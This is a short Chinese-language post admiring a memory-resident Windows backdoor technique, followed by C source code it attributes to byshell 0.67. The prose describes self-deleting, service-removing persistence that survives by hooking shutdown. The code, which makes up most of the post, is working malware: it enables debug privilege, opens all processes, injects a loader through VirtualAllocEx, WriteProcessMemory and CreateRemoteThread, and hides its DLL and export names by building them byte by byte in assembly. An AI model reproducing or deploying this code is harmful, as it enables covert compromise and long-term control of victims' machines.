一个不错的思路隐藏后门，利用线程注射DLL到系统进程，解除DLL映射，并删除自身DLL和EXE文件，删除自身创建的服务，仅仅存在于内存中。于是在寄主机器上无法找到任何新增服务项，磁盘文件或者是进程空间里的不明DLL。关机时，该程序会截获关机的调用，在系统关闭之前恢复自己。缺点是不正常重启之后后门消失.....

以下代码引自byshell0.67，你可以从Xfocus上获取源代码（baiyuanfan大侠的作品撒～）一直没看过后门那些东西的，今天别人提到，没想到有这么不错的东西啊......

void injcode(){HANDLE prohandle;DWORD pid=0;int ret;int tmp;HANDLE fm;
//SE_DEBUG_NAME
 HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;
 LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
 AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);
//retrive pid from toolhelp32
Sleep(1000);
HANDLE snapshot;snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32);
ret=(int)CreateMutex(0,0,"by067clean");
if(!ret){MessageBox(0,0,0,0);goto err1;}
ret=(int)CreateMutex(0,0,"by067revive");
if(!ret){MessageBox(0,0,0,0);goto err1;}
ret=(int)CreateEvent(0,0,1,"by067check");//初始status设置1！切记
if(!ret){MessageBox(0,0,0,0);goto err1;}
fm=CreateFileMapping((HANDLE)-1,0,PAGE_READWRITE,0,1024,"by067filemapping");
if(!fm){MessageBox(0,0,0,0);goto err1;}
//filemapping权限要设置为任何人可读写
PACL pdacl;
PACL pnewdacl;
PSECURITY_DESCRIPTOR psd;
EXPLICIT_ACCESS ace;
int ret1;
GetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,&pdacl,0,&psd);
ace.grfAccessPermissions=GENERIC_ALL;
ace.grfAccessMode=GRANT_ACCESS;
ace.grfInheritance=NO_INHERITANCE;
ace.Trustee.pMultipleTrustee=0;
ace.Trustee.MultipleTrusteeOperation=NO_MULTIPLE_TRUSTEE;
ace.Trustee.TrusteeForm=TRUSTEE_IS_NAME;
ace.Trustee.TrusteeType=TRUSTEE_IS_GROUP;
ace.Trustee.ptstrName="EVERYONE";
SetEntriesInAcl(1,&ace,pdacl,&pnewdacl);
ret1=SetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pnewdacl,0);
if(ret1){goto err2;}
//char injexe[]="explorer.exe";//for dbg only process
for(Process32First(snapshot,&processsnap);Process32Next(snapshot,&processsnap);){
 //if(stricmp(processsnap.szExeFile,injexe)){continue;}
 if(processsnap.th32ProcessID<10){continue;}
 if(!stricmp(processsnap.szExeFile,MAINPROC1)){injapistr.ismainthread=1;}
 else if(!stricmp(processsnap.szExeFile,MAINPROC2)){injapistr.ismainthread=2;}
 else{injapistr.ismainthread=0;}
 pid=processsnap.th32ProcessID;

//inj
prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid);
if(ReadProcessMemory(prohandle,(void*)0x19850000,&tmp,4,(DWORD*)&ret)==1){continue;}
//已经装载了byshell一次？不做动作
DWORD WINAPI injfunc(LPVOID);
HMODULE hModule;LPVOID paramaddr;
hModule=LoadLibrary("kernel32.dll");
injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA");
injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress");
injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc");
injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary");
injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr");
injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree");
paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0);
void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0);
ret=(int)CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0);
if(!ret){int tmp=GetLastError();
#ifdef bydbg
OutputDebugString("cannot infect process:see pid in edx,err code in eax\n");
__asm mov eax,tmp
__asm mov edx,pid
__asm int 3;
#endif
}
CloseHandle(prohandle);

}//end for

CloseHandle(snapshot);
return;

{
err1:
#ifdef bydbg
OutputDebugString("create global obj failed\n");
__asm int 3;
#endif
return;
}
{
err2:
#ifdef bydbg
OutputDebugString("cannot set DACL of section,see err code in eax\n");
__asm mov eax,ret1
__asm int 3;
#endif
return;
}
}

DWORD WINAPI injfunc(LPVOID paramaddr){

char ntboot[16];char msgbox[16];
INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr; 
__asm{ 
mov ntboot,’n’
mov ntboot+1,’t’
mov ntboot+2,’b’
mov ntboot+3,’o’
mov ntboot+4,’o’
mov ntboot+5,’t’
mov ntboot+6,’.’
mov ntboot+7,’d’
mov ntboot+8,’l’
mov ntboot+9,’l’
mov ntboot+10,0

mov msgbox,’C’
mov msgbox+1,’m’
mov msgbox+2,’d’
mov msgbox+3,’S’
mov msgbox+4,’e’
mov msgbox+5,’r’
mov msgbox+6,’v’
mov msgbox+7,’i’
mov msgbox+8,’c’
mov msgbox+9,’e’
mov msgbox+10,0
}
HMODULE hModule=pinjapistr->myLoadLibrary(ntboot);
if((int)hModule!=0x19850000){return 0;}//特殊情况
DWORD (WINAPI *myCmdService)(LPVOID);
myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox));

unsigned int memsize=0;
void * tempdll=pinjapistr->myVirtualAlloc(0,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
memcpy(tempdll,hModule,DLLIMAGESIZE);
pinjapistr->myFreeLibrary(hModule);
hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
memcpy(hModule,tempdll,DLLIMAGESIZE);pinjapistr->myVirtualFree(tempdll,DLLIMAGESIZE,MEM_DECOMMIT);
//

myCmdService((void*)(pinjapistr->ismainthread));
return 0;

}